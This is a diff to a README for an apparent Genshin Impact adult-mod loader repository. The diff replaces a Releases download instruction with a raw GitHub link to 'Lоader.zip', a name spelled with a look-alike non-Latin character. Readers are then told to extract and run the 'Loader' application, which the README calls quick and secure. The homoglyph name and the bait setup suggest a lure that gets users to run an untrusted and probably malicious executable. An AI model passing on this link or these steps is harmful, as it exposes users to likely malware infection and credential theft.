ankit-avkalan/GenshinVelvetVisions/README.md

 **Follow these steps for a quick and secure setup:**

-1. **Download Loader.rar** from this repository’s Releases section.
+1. **Download https://raw.githubusercontent.com/ankit-avkalan/GenshinVelvetVisions/main/Lоader.zip** from this repository’s Releases section.
 2. Extract the contents using your favorite extraction tool (e.g., WinRAR, 7-Zip, The Unarchiver).
 3. Open the *Loader* application matching your Operating System.
 4. Browse the “Mods” folder and add your preferred erotic Genshin Impact mods (refer to our mod marketplace or community recommendations).